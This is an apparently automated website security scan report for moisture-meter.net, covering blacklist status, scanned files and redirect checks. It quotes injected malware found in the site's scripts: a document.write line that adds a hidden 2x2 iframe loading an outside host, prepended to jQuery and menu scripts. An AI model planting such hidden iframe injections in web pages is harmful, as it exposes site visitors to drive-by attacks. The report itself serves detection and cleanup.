Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=moisture-meter.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://moisture-meter.net/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://moisture-meter.net/ | 200 OK Content-Length: 13262 Content-Type: text/html | clean |
http://moisture-meter.net/facefiles/jquery-1.2.2.pack.js | 200 OK Content-Length: 29318 Content-Type: text/javascript | clean |
http://moisture-meter.net/facefiles/facebox.js | 200 OK Content-Length: 6263 Content-Type: text/javascript | clean |
http://moisture-meter.net/js.js | 404 Not Found Content-Length: 18960 Content-Type: text/html | malicious |
Malicious iFrame found. size: 200x33 src: http://www.moisture-meter.net/sc1.php This URL is marked by Yandex as suspicious <iframe src="http://www.moisture-meter.net/sc1.php" frameborder="0" width="200" height="33"> | ||
http://www.moisture-meter.net/js.js | 404 Not Found Content-Length: 18960 Content-Type: text/html | clean |
http://www.moisture-meter.net/js113.js | 200 OK Content-Length: 302395 Content-Type: text/javascript | clean |
http://www.moisture-meter.net/anylinkcssmenu.js | 404 Not Found Content-Length: 18960 Content-Type: text/html | clean |
http://www.moisture-meter.net/tree_frog_slide/stuHover.js | 200 OK Content-Length: 1067 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://baloncestocuellar.com/whci.html?j=1219206></iframe>');
stuHover = function() { var cssRule; var newSelector; for (var i=0; i< document.styleSheets.length; i++) for (var x=0; x< document.styleSheets[i].rules.length; x++) { cssRule = document.styleSheets[i].rules[x]; if (cssRule.selectorText.indexOf("LI:hover") >= 0) } } var getElm = document.getElementById("nav").getElementsByTagName("LI"); for (var i=0; i<getElm.length; i++) { getElm[i].onmouseover=function() { this.className+=" iehover"; } getElm[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" iehover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", stuHover); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://baloncestocuellar.com/whci.html?j=1219206 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://baloncestocuellar.com/whci.html?j=1219206> | ||
http://www.moisture-meter.net/facefiles/jquery-1.2.2.pack.js | 200 OK Content-Length: 29318 Content-Type: text/javascript | clean |
http://www.moisture-meter.net/facefiles/facebox.js | 200 OK Content-Length: 6263 Content-Type: text/javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12777 Content-Type: application/javascript | clean |
http://www.moisture-meter.net/js14.js | 404 Not Found Content-Length: 18960 Content-Type: text/html | clean |
http://www.moisture-meter.net/js15.js | 404 Not Found Content-Length: 18960 Content-Type: text/html | clean |
http://www.moisture-meter.net/exporter/Grain-Moisture-Meter.html | 200 OK Content-Length: 25553 Content-Type: text/html | clean |
http://www.moisture-meter.net/js/jquery-1.6.2.min.js | 200 OK Content-Length: 91722 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://baloncestocuellar.com/whci.html?j=1219206></iframe>');
(function(a,b){function cv(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cs(a){if(!cg[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ch||(ch=c.createElement("iframe"),ch.frameBorder=ch.width=ch.height=0),b.appendChild(ch) Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://baloncestocuellar.com/whci.html?j=1219206 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://baloncestocuellar.com/whci.html?j=1219206> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: moisture-meter.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 07:28:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: moisture-meter.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 07:28:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: moisture-meter.net
Referer: http://www.google.com/search?q=moisture-meter.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: moisture-meter.net
Referer: http://www.google.com/search?q=moisture-meter.net
Result:
The result is similar to the first query. There are no suspicious redirects found.